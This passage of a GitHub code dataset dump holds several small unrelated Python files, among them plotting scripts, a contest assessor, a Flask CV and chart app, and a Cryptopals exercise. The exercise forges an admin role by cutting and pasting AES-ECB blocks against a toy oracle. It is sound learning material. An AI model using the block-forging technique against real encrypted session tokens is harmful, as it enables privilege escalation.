to figure out 3.2 or 3.4\n","repo_name":"jfonseca4/FonsecaCSC201-program03","sub_path":"program03-Part2.py","file_name":"program03-Part2.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30540612276","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport subprocess \n\ndef outlier_remove(data):\n\tmin_quan= data['Actual'].quantile(0.25)\n\tmax_quan= data['Actual'].quantile(0.75)\n\tIQR = max_quan - min_quan\n\t# print(min_quan, max_quan, IQR)\n\tmax_quan = max_quan + (1.5 * IQR)\n\t# print(min_quan, max_quan)\n\tdata = data[data['Actual'] > min_quan]\n\tdata = data[data['Actual'] < max_quan]\n\treturn data \n\n# subprocess.call('/usr/bin/python3 ~/workspace/tableau/python_scripts/mongo_to_csv.py', shell = True)\n\n \ndataset = pd.read_csv('/home/u73/workspace/tableau/python_scripts/new_data_transformed_metrics.csv', low_memory = False)\n# dataset = outlier_remove(dataset)\n# dataset.to_csv('eg.csv', index = False)\n\n\n# print('range of actuals {} to {}'.format(min(dataset['Actual']),max(dataset['Actual'])))\n\ndataset['Date'] = dataset['Date'].apply(lambda x: str(x).split(' ')[0])\ndataset = dataset[['Date','Session','Item','Actual','Predicted']]\ndataset = dataset.query('Item == \"ANDHRA VEG MEALS\" and Session == \"Morning\" and Date >= \"2019-04-01\"')\ndataset = dataset.groupby(['Date']).agg({'Actual':'sum', 'Predicted':'sum'})\n# dataset.to_csv('eg.csv', index = False)\n\nplt.plot(dataset['Actual'], color = 'red', label = 'actuals')\nplt.plot(dataset['Predicted'], color = 'blue', label = 'predicted')\ndates = dataset.iloc[:,1]\nplt.xticks(rotation = 90)\nplt.xlabel('dates')\nplt.ylabel('QTY')\nplt.legend(loc ='upper 
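Aside: `outlier_remove` in the plotting script above keeps rows between Q1 and Q3 + 1.5*IQR, leaving the lower bound at Q1 itself; the textbook Tukey fence widens both ends. Sketch of the standard version:

```python
import pandas as pd

def tukey_filter(s: pd.Series, k: float = 1.5) -> pd.Series:
    q1, q3 = s.quantile(0.25), s.quantile(0.75)
    iqr = q3 - q1
    return s[(s >= q1 - k * iqr) & (s <= q3 + k * iqr)]

print(tukey_filter(pd.Series([1, 2, 3, 4, 5, 100])))   # drops the 100
```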
right')\nplt.show()\n","repo_name":"Marvel-Jacob/Exercises","sub_path":"SGD_linear_model.py","file_name":"SGD_linear_model.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27456129154","text":"#!/usr/bin/env python3\n\nimport json\nimport subprocess\nimport sys\nimport os\nimport shutil\n\nif len(sys.argv) != 2:\n print(\"Usage: assessor.py <settings file path>\")\n sys.exit(1)\n\n# Read and print settings\nprint(\"Settings\")\nwith open(sys.argv[1], \"r\") as f:\n settings = json.load(f)\nprint(\"\\n\".join([f\"- {k}: {v}\" for k, v in settings.items()]))\nprint()\n\n# Read seeds\nseeds = []\nwith open(settings[\"seedsPath\"], \"r\") as f:\n for string_seed in f:\n string_seed = string_seed.rstrip(\"\\n\")\n try:\n seed = int(string_seed)\n seeds += [seed]\n except ValueError:\n print(f\"Discarding invalid seed: '{string_seed}'\")\n\n# Determine results\nresults = []\nwins = 0\nwin_rounds = 0\nlosses = 0\nloss_rounds = 0\nif not os.path.exists(settings[\"gamesPath\"]):\n os.mkdir(settings[\"gamesPath\"])\nfor seed in seeds:\n try:\n print(f\"{seed: <25}\", end=\"\", flush=True)\n try:\n output_path = f'{settings[\"gamesPath\"]}/{seed}.json'\n if os.path.exists(output_path):\n print(\"skipped\")\n continue\n process = subprocess.run(\n [\n settings[\"binaryPath\"], \"-s\",\n str(seed), \"-u\", settings[\"endpointURL\"], \"-t\",\n str(settings[\"timeout\"]), \"-o\", output_path\n ]\n )\n lines = tuple(open(output_path, \"r\"))\n except Exception as exception:\n print(\"failed\")\n os.remove(output_path)\n print(f\"Failed to run command line tool: {exception}\")\n break\n state = json.loads(lines[-1])\n rounds = state[\"round\"]\n outcome = state[\"outcome\"]\n result = {\"rounds\": rounds, \"outcome\": outcome, \"seed\": seed}\n results += [result]\n if outcome == \"win\":\n wins += 1\n win_rounds += rounds\n if outcome == \"loss\":\n losses += 1\n loss_rounds += rounds\n print(f'{outcome} ({rounds})')\n except KeyboardInterrupt:\n print(\"interrupted\")\n os.remove(output_path)\n break\nprint(f\"{wins} ({win_rounds}) - {losses} ({loss_rounds})\")\n\n# Store results\nwith open(settings[\"resultsPath\"], \"w\") as f:\n json.dump(results, f)\n","repo_name":"informatiCup/informatiCup2020","sub_path":"src/tools/assessor/assessor.py","file_name":"assessor.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"35465257065","text":"#\n# Prompt the user to input two numbers, check if the denominator (the bottom number)\n# is 0. 
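Aside: the assessor above reads the last line of each game log as JSON to recover `round` and `outcome`. A slightly defensive version of that step (sketch; skips blank trailing lines):

```python
import json

def final_state(path):
    with open(path) as f:
        lines = [ln for ln in f if ln.strip()]
    return json.loads(lines[-1]) if lines else None

# state = final_state('games/12345.json')   # path is illustrative
# print(state['outcome'], state['round'])
```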
If it is then print \"You can't divide by zero!\", otherwise print the quotient.\n#-----------------------------------------------------------------------------------------------------\n\n\n\nnum1 = input(\"Give me a number \")\nnum2 = input(\"Give me another number\")\n\nnum1 = int(num1)\nnum2 = int(num2)\n\nif num2 == 0:\n print(\"You can't divide by zero!\")\nelse:\n print(num1 / num2)\n\n\n\n\n\n","repo_name":"SeaStarr7/PythonClass","sub_path":"Week1/pyPrep_week01_drill_06.py","file_name":"pyPrep_week01_drill_06.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32477724230","text":"import sys\n\nprvniCislo = int(sys.argv[1])\ndruheCislo = int(sys.argv[2])\n\nif druheCislo == 0:\n print('Nulou se delit nelze')\nelse:\n podilCisel=prvniCislo / druheCislo \n print(f\"Podil cisel {prvniCislo} a {druheCislo} je {round(podilCisel,3)}\")","repo_name":"Nadaercz/Nadazkouska2010","sub_path":"deleni.py","file_name":"deleni.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28523136402","text":"# Cryptopals\n# Set 2 Challenge 13\n\nfrom Crypto.Cipher import AES\nfrom random import randint\n\n# Decrypt with AES in ECB\ndef AES_ECB_decrypt(bytes_code, key):\n aes_cipher = AES.new(key, AES.MODE_ECB)\n return aes_cipher.decrypt(bytes_code)\n\n# Encrypt with AES in ECB\ndef AES_ECB_encrypt(bytes_code, key):\n aes_cipher = AES.new(key, AES.MODE_ECB)\n return aes_cipher.encrypt(bytes_code)\n\ndef pad_PKCS_7(message, blocksize):\n padding_amount = blocksize - len(message) % blocksize\n if padding_amount == 0:\n padding_amount = blocksize\n padding = bytes([padding_amount]) * padding_amount\n return message + padding\n\ndef unpad_PKCS_7(message, blocksize):\n padding_amount = message[-1]\n return message[:-padding_amount]\n\ndef random_bytes(n):\n random_ints = []\n for i in range(n):\n random_ints.append(randint(0,255))\n return bytes(random_ints)\n\nRANDOM_KEY = random_bytes(16)\n\ndef random_encode(message):\n message = pad_PKCS_7(message,16)\n return AES_ECB_encrypt(message, RANDOM_KEY)\n\ndef parse_key_val(encoded_string):\n key_val_string = str(unpad_PKCS_7(AES_ECB_decrypt(encoded_string, RANDOM_KEY), 16))[2:-1]\n key_val_list = key_val_string.split(\"&\")\n key_val_obj = {}\n for pair in key_val_list:\n key_val = pair.split(\"=\")\n key_val_obj[key_val[0]] = key_val[1]\n return key_val_obj\n\ndef profile_for(email):\n if (email.find(\"&\") != -1 or email.find(\"=\") != -1):\n return \"Invalid Email\"\n else:\n profile_string = \"email=\" + email + \"&uid=10&role=user\"\n encoded_profile = random_encode(bytes(profile_string, 'ascii'))\n return encoded_profile\n\ntest = profile_for(\"kels@mail.com\")\nprint(test)\nprint(parse_key_val(test))\n\n# need to figure out ciphertext that produces \"&role=admin\" without being able to feed & or = into profile_for\ntest_email_1 = \"kels@mail.com\"\ntest_encode = profile_for(test_email_1)\nemail_code = test_encode[:16]\nuid_role_garbage = test_encode[16:32]\ntest_email_2 = (\"0\" * 10) + \"admin\" + (\"\\x0b\" * 11)\ntest_encode = profile_for(test_email_2)\nadmin_chunk = test_encode[16:32]\nprint(parse_key_val(email_code + uid_role_garbage + 
admin_chunk))\n","repo_name":"langlk/Cryptopals","sub_path":"Set2/Set2Challenge13.py","file_name":"Set2Challenge13.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11366585487","text":"\nfrom flask import Flask, render_template, request\nimport pandas as pd\nimport json\nimport plotly\nimport plotly.express as px\n\nimport csv, re, operator\n# from textblob import TextBlob\n\napp = Flask(__name__)\n\nperson = {\n 'first_name': '黄',\n # 'first_name': '111',\n 'last_name' : '思雨',\n 'sx':'hsy',\n 'con':'123 My Place Drive',\n 'address' : '湖北师范大学',\n 'job': 'Web developer',\n 'tel': '0678282923',\n 'email': 'sasa07072021@outlook.com',\n # 'description' : 'Suite à une expérience internationale en développement web et dans le domaine des arts, l’impact de l’intelligence artificielle dans nos vies me surprend de jour en jour. \\n Aujourd’hui, je souhaite changer de cap et comprendre les secrets que recèlent nos données. J’aimerais mettre à profit ces découvertes au service des entreprises/associations à dimension sociale.',\n 'description' : '我待人真诚,工作认真负责;积极主动,能吃苦耐劳,勇于承受压力;有很强团队协作精神,具有较强的适应能力;纪律性强; 意志坚强,具有较强的无私奉献精神。对待工作认真负责,善于沟通;活泼开朗、乐观上进、有爱心;上进心强、勤于学习能不断提高自身的能力与综合素质。在未来的工作中,我将以充沛的精力,刻苦钻研的精神来努力工作,稳定地提高自己的工作能力,与公司同步发展',\n # 'social_media' : [\n 'social_media' : [\n {\n 'link': '252809',\n 'icon' : 'fa-facebook-f'\n },\n {\n 'link': 'https://github.com/silver201',\n 'icon' : 'fa-github'\n },\n {\n 'link': 'sasa0707@outlook.com',\n 'icon' : 'fa-linkedin-in'\n }\n ],\n 'img': 'img/123.jpg',\n 'experiences' : [\n {\n 'title' : '记账微信小程序',\n 'company': 'AZULIK',\n 'description' : '此项目是一个记账的微信小程序,通过微信用户登录实现记账、预算、展示消费图表等功能。项目技术:项目使用微信开发者工具进行开发,数据库使用微信开发者工具自带的云数据 库。本人主要运用node.js编写实现数据库连接并展示消费图表功能、以及wxml实现界面的一些设计。',\n 'timeframe' : '2021.03-2021.06'\n },\n {\n 'title' : '简易购物商城',\n 'company': 'Independant',\n 'description' : '网页主要展示了一个小型的购物商城。功能包括登录、注册、商品展示、购物车、个人中心、订单展示等。项目描述:网页采用MVC三层框架,WEB层使用jsp技术,控制转发层使用自定义的Servlet来控制,业务逻辑层使用轻量级的JavaBean,,主要使用html+css进行布局美化, 数据库使用mysql实现对数据的操作。项目成果:完成了页面设计(登录注册、商城展示、下订 单、购物车、订单展示、个人中心)以及页面实现。 ',\n 'timeframe' : '2020.09-2020.12'\n }\n # ,\n # {\n # 'title' : 'Sharepoint Intern',\n # 'company': 'ALTEN',\n # 'description' : 'Help to manage a 600 Sharepoint sites platform (audit, migration to Sharepoint newer versions)',\n # 'timeframe' : 'October 2015 - October 2016'\n # }\n ],\n 'education' : [\n {\n # 'university': 'Paris Diderot',\n # 'degree': 'Projets informatiques et Startégies d\\'entreprise (PISE)',\n # 'description' : 'Gestion de projets IT, Audit, Programmation',\n # 'mention' : 'Bien',\n # 'timeframe' : '2015 - 2016'\n 'university': '湖北师范大学',\n # 'degree': 'Projets informatiques et Startégies d\\'entreprise (PISE)',\n 'degree': '软件工程',\n 'description' : '主修课程:C/C++程序设计、数据结构、数据库原理及开发、Java应用开发与实践、Python程序设计基础、软件过程与管理。',\n # 'mention' : 'Bien',\n 'timeframe' : '2018 - 2022'\n }\n ],\n 'programming_languages' : {\n 'HMTL' : ['fa-html5', '100'], \n 'CSS' : ['fa-css3-alt', '100'], \n 'JS' : ['fa-js-square', '90'],\n 'Python': ['fa-python', '70'],\n 'MySQL' : ['fa-database', '60'],\n 'NodeJS' : ['fa-node-js', '50']\n },\n # 'languages' : {'French' : 'Native', 'English' : 'Professional', 'Spanish' : 'Professional', 'Italian' : 'Limited Working Proficiency'},\n 'languages' : {'French' : 'Native', 'English' : 'Professional', 'Spanish' : 'Professional', 'Italian' : 'Limited Working Proficiency'},\n 'interests' : ['运动', '吃东西', 'Languages']\n}\n\n@app.route('/')\ndef 
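Aside: why the crafted emails in the ECB cut-and-paste attack above work -- PKCS#7 pads "admin" to a full 16-byte block with eleven \x0b bytes, and ten filler characters after the 6-byte "email=" prefix push the payload onto a block boundary. Sketch:

```python
def pad_pkcs7(msg: bytes, blocksize: int = 16) -> bytes:
    n = blocksize - len(msg) % blocksize
    return msg + bytes([n]) * n

admin_block = pad_pkcs7(b"admin")             # b'admin' + b'\x0b' * 11
assert len(admin_block) == 16

prefix = b"email="                             # 6 bytes of fixed prefix...
filler = b"0" * (16 - len(prefix))             # ...plus 10 filler characters
assert len(prefix + filler) == 16              # so 'admin...' starts block 2
```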
cv(person=person):\n return render_template('index.html', person=person)\n\n\n@app.route('/callback', methods=['POST', 'GET'])\ndef cb():\n\treturn gm(request.args.get('data'))\n\n@app.route('/callback1', methods=['POST', 'GET'])\ndef cb1():\n\treturn am(request.args.get('data'))\n\n@app.route('/callback2', methods=['POST', 'GET'])\ndef cb2():\n\treturn gm10(request.args.get('data'))\n \n@app.route('/callback3', methods=['POST', 'GET'])\ndef cb3():\n\treturn gm11(request.args.get('data'))\n\n@app.route('/chart')\ndef index():\n\treturn render_template('chartsajax.html', graphJSON=gm(),graphJSON1=am(),graphJSON2=gm1(),graphJSON3=gm2(),graphJSON4=gm3(),\n\t\tgraphJSON5=gm4(),graphJSON6=gm5(),graphJSON7=gm6(),graphJSON8=gm7(),\n\t\tgraphJSON9=gm8(),graphJSON10=gm9(),graphJSON11=gm10(),graphJSON12=gm11(),\n\t\tgraphJSON13=gm12(),graphJSON14=gm13(),graphJSON15=gm14(),graphJSON16=gm15(),graphJSON17=gm16())\n\n# def gm(country='United Kingdom'):\ndef gm(sex='Male'):\n\t# df = pd.DataFrame(px.data.gapminder())\n\t# df = pd.DataFrame(px.data.iris())\n\tdf = pd.DataFrame(px.data.tips())\n\t# fig = px.line(df[df['country']==country], x=\"year\", y=\"gdpPercap\")\n\t# fig = px.scatter(df, x=\"sepal_width\", y=\"sepal_length\", color=\"species\")\n\t# fig1 = px.line(df[df['smoker']==smoker], x=\"sex\", y=\"size\")\n\t# fig = px.scatter(df[df['smoker']==smoker], x=\"total_bill\", y=\"sex\")\n\t# a=[]\n\tfig=px.scatter(df[df['sex']==sex], x=\"total_bill\", y=\"tip\", color=\"size\", facet_col=\"sex\",\n color_continuous_scale=px.colors.sequential.Viridis, \n render_mode=\"webgl\")\n\t# fig1=px.line(df, x=\"sex\", y=\"size\")\n\t# a.append(fig)\n\t# a.append(fig1)\n\t# graphJSON=[]\n\t# graphJSON=graphJSON.push(json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder))\n\t# graphJSON=graphJSON.push(json.dumps(fig1, cls=plotly.utils.PlotlyJSONEncoder))\n\t\n\t# graphJSON1 = json.dumps(fig1, cls=plotly.utils.PlotlyJSONEncoder)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\t# a=[]\n\t# a.append(graphJSON)\n\t# a.append(graphJSON1)\n\t# return a\n\treturn graphJSON\n\ndef am(sex='Male'):\n\tdf = pd.DataFrame(px.data.tips())\n\t# fig = px.line(df[df['smoker']==smoker], x=\"sex\", y=\"size\")\n\tfig=px.scatter(df[df['sex']==sex], x=\"total_bill\", y=\"tip\", facet_row=\"time\", facet_col=\"day\",\n color=\"smoker\", trendline=\"ols\",category_orders={\"day\": [\"Thur\", \n \"Fri\", \"Sat\", \"Sun\"], \"time\": [\"Lunch\", \"Dinner\"]})\n\t# fig=px.scatter(df, x=\"total_bill\", y=\"tip\", facet_row=\"time\", facet_col=\"day\", color=\"smoker\", trendline=\"ols\",category_orders={\"day\": [\"Thur\", \n # \"Fri\", \"Sat\", \"Sun\"], \"time\": [\"Lunch\", \"Dinner\"]})\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm1():\n\tdf = pd.DataFrame(px.data.tips())\n\tfig = px.scatter_matrix(df)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm2():\n\tdf = pd.DataFrame(px.data.tips())\n\tfig = px.parallel_categories(df, color=\"size\", color_continuous_scale=px.\n colors.sequential.Inferno)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm3():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig =px.scatter_geo(df, locations=\"iso_alpha\", color=\"continent\", hover_name=\"country\", size=\"pop\",\n animation_frame=\"year\", projection=\"natural earth\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm4():\n\tdf = 
pd.DataFrame(px.data.tips())\n\tfig = px.bar(df, x=\"sex\", y=\"total_bill\", color=\"smoker\", barmode=\"group\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm5():\n\tdf = pd.DataFrame(px.data.tips())\n\tfig = px.bar(df, x=\"sex\", y=\"total_bill\", color=\"smoker\", barmode=\"group\", \n facet_row=\"time\", facet_col=\"day\", category_orders={\"day\": [\"Thur\", \n \"Fri\", \"Sat\", \"Sun\"], \"time\": [\"Lunch\", \"Dinner\"]})\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm6():\n\tdf = pd.DataFrame(px.data.tips())\n\tfig = px.box(df, x=\"day\", y=\"total_bill\", color=\"smoker\", notched=True)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm7():\n\tdf = pd.DataFrame(px.data.tips())\n\tfig =px.violin(df, y=\"tip\", x=\"smoker\", color=\"sex\", box=True, points=\"all\", \n hover_data=df.columns)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm8():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig =px.choropleth(df, locations='iso_alpha', color='lifeExp', hover_name='country', animation_frame='year',\n color_continuous_scale=px.colors.sequential.Plasma, projection='natural earth')\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm9():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig =px.line_geo(df.query(\"year==2007\"), locations=\"iso_alpha\", \n color=\"continent\", projection=\"orthographic\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm10(country='United Kingdom'):\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig =fig = px.line(df[df['country']==country], x=\"year\", y=\"lifeExp\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm11(country='United Kingdom'):\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig = px.line(df[df['country']==country], x=\"year\", y=\"gdpPercap\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm12():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig=px.scatter(df.query(\"year==2007\"), x='gdpPercap', y='lifeExp', color='continent', size='pop', size_max=60)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm13():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig=px.scatter(df.query(\"year==2007\"),x='gdpPercap', y='lifeExp', color='continent', size='pop', size_max=60, hover_name='country', facet_col='continent', log_x=True)\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm14():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig=px.scatter(df, x='gdpPercap', y='lifeExp', size='pop', color='continent', hover_name='country', \n animation_frame='year', animation_group='country', log_x=True, range_x=[100,100000], range_y=[25, 90],\n labels=dict(pop='Population', gdpPercap='GDP per Capita', lifeExp='Life Expectancy'))\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm15():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig=px.line(df, x=\"year\", y=\"lifeExp\", color=\"continent\", \n line_group=\"country\", hover_name=\"country\",\n line_shape=\"spline\", render_mode=\"svg\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\ndef gm16():\n\tdf = pd.DataFrame(px.data.gapminder())\n\tfig=px.area(df, x=\"year\", 
y=\"pop\", color=\"continent\", \n line_group=\"country\")\n\tgraphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\treturn graphJSON\n\n@app.route('/senti')\ndef main():\n\ttext = \"\"\n\tvalues = {\"positive\": 0, \"negative\": 0, \"neutral\": 0}\n\n\twith open('ask_politics.csv', 'rt') as csvfile:\n\t\treader = csv.DictReader(csvfile, delimiter=',', quotechar='\"')\n\t\tfor idx, row in enumerate(reader):\n\t\t\tif idx > 0 and idx % 2000 == 0:\n\t\t\t\tbreak\n\t\t\tif 'text' in row:\n\t\t\t\tnolinkstext = re.sub(r'''(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\".,<>?«»“”‘’]))''', '', row['text'], flags=re.MULTILINE)\n\t\t\t\ttext = nolinkstext\n\n\t\t\tblob = TextBlob(text)\n\t\t\tfor sentence in blob.sentences:\n\t\t\t\tsentiment_value = sentence.sentiment.polarity\n\t\t\t\tif sentiment_value >= -0.1 and sentiment_value <= 0.1:\n\t\t\t\t\tvalues['neutral'] += 1\n\t\t\t\telif sentiment_value < 0:\n\t\t\t\t\tvalues['negative'] += 1\n\t\t\t\telif sentiment_value > 0:\n\t\t\t\t\tvalues['positive'] += 1\n\n\tvalues = sorted(values.items(), key=operator.itemgetter(1))\n\ttop_ten = list(reversed(values))\n\tif len(top_ten) >= 11:\n\t\ttop_ten = top_ten[1:11]\n\telse :\n\t\ttop_ten = top_ten[0:len(top_ten)]\n\n\ttop_ten_list_vals = []\n\ttop_ten_list_labels = []\n\tfor language in top_ten:\n\t\ttop_ten_list_vals.append(language[1])\n\t\ttop_ten_list_labels.append(language[0])\n\n\tgraph_values = [{\n\t\t\t\t\t'labels': top_ten_list_labels,\n\t\t\t\t\t'values': top_ten_list_vals,\n\t\t\t\t\t'type': 'pie',\n\t\t\t\t\t'insidetextfont': {'color': '#FFFFFF',\n\t\t\t\t\t\t\t\t\t\t'size': '14',\n\t\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t'textfont': {'color': '#FFFFFF',\n\t\t\t\t\t\t\t\t\t\t'size': '14',\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t}]\n\n\tlayout = {'title': '<b>意见挖掘</b>'}\n\n\treturn render_template('index.html', graph_values=graph_values, layout=layout)\n\n\nif __name__ == '__main__':\n app.run(debug= True,port=5000,threaded=True)\n","repo_name":"silver201/Myproject","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":13481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42013768852","text":"import nodes_parser as npa\r\nimport token_lexer as tl\r\nimport translator as tra\r\n###############################################################################\r\n# token_lexer - Contain functions for tokenization and lexer.\r\n# nodes_parser - Used for the creation of nodes and interpretation of tokens.\r\n# translator - Combine tokenization and translation of python file.\r\n###############################################################################\r\nimport argparse\r\n\r\ndef get_args():\r\n \r\n parser = argparse.ArgumentParser()\r\n \r\n parser.add_argument(\"-p\", \"--path_to_python\", help=\"Path to python file\", type=str, required=True)\r\n parser.add_argument(\"-c\", \"--path_to_cpp\", help=\"Path to C++ file\", type=str, required=False)\r\n parser.add_argument(\"-no_save\", \"--save\", help=\"By default, the result is saved\", action='store_false')\r\n parser.add_argument(\"-no_display\", \"--display\", help=\"By default, the result is presented\", action='store_false')\r\n \r\n args = parser.parse_args()\r\n \r\n return args.path_to_python, args.path_to_cpp, args.save, args.display\r\n\r\n\r\ndef main():\r\n path_to_python, path_to_cpp, save, display = 
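Aside: every chart route above repeats the same two steps -- build a Plotly Express figure, then serialise it with `PlotlyJSONEncoder` for the page's AJAX callback. Folded into one helper (sketch):

```python
import json
import plotly
import plotly.express as px

def fig_to_json(fig) -> str:
    return json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)

df = px.data.gapminder()
payload = fig_to_json(px.line(df[df['country'] == 'France'], x='year', y='lifeExp'))
print(payload[:80])
```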
get_args()\r\n \r\n test_fib = tra.translator(path_to_python,path_to_cpp)\r\n test_fib.tokenize()\r\n test_fib.translate()\r\n \r\n if(save == True and path_to_cpp != None):\r\n test_fib.save_cpp()\r\n elif(save == False and path_to_cpp != None):\r\n print('No path to C++ file')\r\n if(display == True):\r\n print(\"------------------------\")\r\n print(\"Tokens\")\r\n print(\"------------------------\\n\") \r\n print(test_fib.tokens)\r\n print(\"------------------------\")\r\n print(\"Python code\")\r\n print(\"------------------------\")\r\n print(test_fib.python_code)\r\n print(\"\\n------------------------\")\r\n print(\"C++ code\")\r\n print(\"------------------------\")\r\n print(test_fib.cpp_code)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"KonradOrzelowski/Python2Cpp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22858835615","text":"from http import HTTPStatus\n\nfrom app.data.protocols.log_error_repository import LogErrorRepository\nfrom app.presentation.protocols import Controller, HttpRequest, HttpResponse\n\n\nclass LogControllerDecorator(Controller):\n def __init__(\n self, controller: Controller, log_error_repository: LogErrorRepository\n ):\n self._controller = controller\n self._log_error_repository = log_error_repository\n\n def handle(self, http_request: HttpRequest) -> HttpResponse:\n http_response = self._controller.handle(http_request)\n if http_response.status == HTTPStatus.INTERNAL_SERVER_ERROR:\n self._log_error_repository.log_error(http_response.body.stack)\n return http_response\n","repo_name":"rafaph/clean-python-api","sub_path":"app/main/decorators/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71053850385","text":"#!/usr/bin/env python3.6\n# -*- Coding: UTF-8 -*-\n\"\"\"\nThe validate functions of meta-language.\nGiven a logml file, return the sintatic structure.\nBy: E. S. 
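Aside: `LogControllerDecorator` above is the classic decorator pattern -- it exposes the same `handle` interface as the wrapped controller while bolting on error logging as a cross-cutting concern. Generic sketch (class and parameter names are illustrative):

```python
class Controller:
    def handle(self, request):
        raise NotImplementedError

class LoggingController(Controller):
    def __init__(self, inner: Controller, log_error):
        self._inner = inner
        self._log_error = log_error

    def handle(self, request):
        response = self._inner.handle(request)
        if getattr(response, "status", 200) >= 500:
            self._log_error(response)      # log only server-side failures
        return response
```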
Pereira\nVersion: 0.0.1\nDate: 31/08/2017\n\"\"\"\n\nfrom .exceptions import NoKeyExpressionFounded, InvalidKeyExpressionFounded\nfrom .exceptions import InconsistenNumberOfArgsIFacts, EmptyFact\nfrom .exceptions import NoClosedKeyExpression\n\n\ndef validate_meta(frase, predicate):\n \"\"\"\n Validate main text in meta-language\n \"\"\"\n if \"#\" not in frase:\n raise NoKeyExpressionFounded(\n \"No # simbol found in {}\".format(predicate))\n if frase.count(\"#\") > 2:\n raise InvalidKeyExpressionFounded(\n \"More than 2 # simbol found in {}\".format(predicate))\n if frase.count(\"#\") == 1:\n raise NoClosedKeyExpression(\n \"No closed # simbol found in {}\".format(predicate))\n\ndef validate_meta_star(frase, predicate, args):\n \"\"\"\n Validade change simbol in meta-language\n \"\"\"\n if isinstance(args, list):\n tmp = list(set([len(ai[\"dynamic\"]) for ai in args if \"dynamic\" in ai]))\n args = tmp + list(set([len(ai[\"1\"]) for ai in args if \"1\" in ai]))\n else:\n args = list(set([len(args[\"1\"])]))\n\n if len(args) > 1:\n raise InconsistenNumberOfArgsIFacts(\n \"Number of args inconsisten in {}\".format(predicate)\n )\n\n if not args:\n raise EmptyFact(\n \"No args found in {}\".format(predicate)\n )\n\n\n if \"*\" not in frase:\n raise NoKeyExpressionFounded(\n \"No * simbol found in {}\".format(predicate))\n if frase.count(\"*\") > args[0]:\n raise InvalidKeyExpressionFounded(\n \"More * than constants in {}\".format(predicate))\n if frase.count(\"*\") < args[0]:\n raise InvalidKeyExpressionFounded(\n \"Less * than constants in 